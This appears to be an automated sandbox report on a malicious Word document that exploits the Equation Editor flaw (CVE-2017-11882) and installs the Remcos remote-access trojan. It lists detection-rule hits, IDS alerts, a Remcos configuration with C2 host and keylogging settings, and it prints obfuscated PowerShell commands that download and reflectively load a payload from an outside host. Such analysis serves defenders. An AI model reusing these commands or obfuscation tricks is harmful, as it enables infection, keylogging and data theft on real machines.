C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, 
ParentCommandLine: "C:\Windows\
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4076, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", ProcessId: 2736, ProcessName: RegAsm.exe
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f 
[ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3864, TargetFilename: C:\Users\user\AppData\Local\Temp\0gqtl14z.fpz.ps1

                  Stealing of Sensitive Information

                  Source: Registry Key set; Author: Joe Security; Data: Details: F8 BC 67 43 59 29 BE 56 B0 E1 4E EA 1A 72 4F 4E A5 20 93 B6 A7 9F F7 A0 33 BD 88 4F 68 8C D4 3B 20 47 FE 04 CE AF D6 CC 99 FA 7A D3 52 65 0B 99 61 A0 68 7D 64 97 64 F3 6A A9 13 6E 81 A8 93 EB 02 E7 A1 85 5D 3B CE A6 25 92 FF 89 58 C3 E7 82 E2 6B AC F3 76 83 5B E6 3C 76 E8 1B C5 40 00 0A 03 C2 3D 70 44 BB 60 9A 7D 55 CD 4E AE 57 EE D6 E1 21 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4076, TargetObject: HKEY_CURRENT_USER\Software\Rmc-EPF38I\exepath
                  Timestamp                        SID      Severity  Classtype                                      Source IP      Source Port  Destination IP  Destination Port  Protocol
                  2024-09-30T16:24:36.445590+0200  2020423  1         Exploit Kit Activity Detected                  91.134.96.177  80           192.168.2.22    49173             TCP
                  2024-09-30T16:24:36.445590+0200  2020425  1         Exploit Kit Activity Detected                  91.134.96.177  80           192.168.2.22    49173             TCP
                  2024-09-30T16:24:37.947876+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22   49174        45.90.89.98     6845              TCP
                  2024-09-30T16:24:39.497208+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22   49175        45.90.89.98     6845              TCP
                  2024-09-30T16:24:39.279885+0200  2803304  3         Unknown Traffic                                192.168.2.22   49176        178.237.33.50   80                TCP

                  AV Detection

                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPF38I", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: AMG Cargo Logistic.docx; ReversingLabs: Detection: 13%
                  Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 13_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 16_2_00404423 FreeLibrary,CryptUnprotectData,16_2_00404423
                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_de6a2b67-d

                  Exploits

                  Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 91.134.96.177 Port: 80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\wscript.exe
                  Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.dr; Stream path '_1789197015/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 13_2_00407538 _wcslen,CoGetObject,13_2_00407538
                  Source: unknown; HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknown; HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknown; HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown; HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
